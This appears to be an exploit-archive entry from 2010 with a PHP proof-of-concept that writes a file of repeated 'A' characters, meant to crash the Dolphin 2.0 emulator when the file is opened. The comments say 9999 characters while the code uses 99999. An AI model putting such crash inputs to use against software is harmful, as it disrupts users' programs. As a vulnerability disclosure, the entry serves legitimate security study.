Dolphin version 2.0 suffers from a local denial of service vulnerability.
1085f4ec4069e566fb189a105767ea7b132399867ca9c1e248dd73b1c7be0c3e
# Exploit Title: Dolphin 2.0 (.elf) Local Daniel Of Service
# Date: 08/05/2010
# Author: Pr0T3cT10n
# Software Link: http://www.dolphin-emu.com/
# Version: 2.0
# Tested on: 2.0
# CVE:
# Code:
<?php
# Dolphin 2.0 (.elf) Local Daniel Of Service
# Software Site: http://www.dolphin-emu.com/
# Software Download: http://www.dolphin-emu.com/downloads.php?cat_id=9&download_id=94
# Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>
# Site: http://www.nullbyte.org.il
##################################################################
# Dolphin 2.0 is vulnerable to local denial of service attack.
# When we try to open a file by 'Open(CTRL+O)'
# that contains 9999 chars ('A'), so dolphin should crash.
##################################################################
# PoC / Code:
$buffer = str_repeat('A', 99999); # Create 9999 chars('A')..
if(file_put_contents('crash.bin', $buffer)) {
echo("File created successfuly.\r\nDolphin should crash when you open the file with it.\r\n");
} else {
echo("Can't create file. Try again.\r\n");
}
# Cya :)
# NULLBYTE.ORG.IL
####################
?>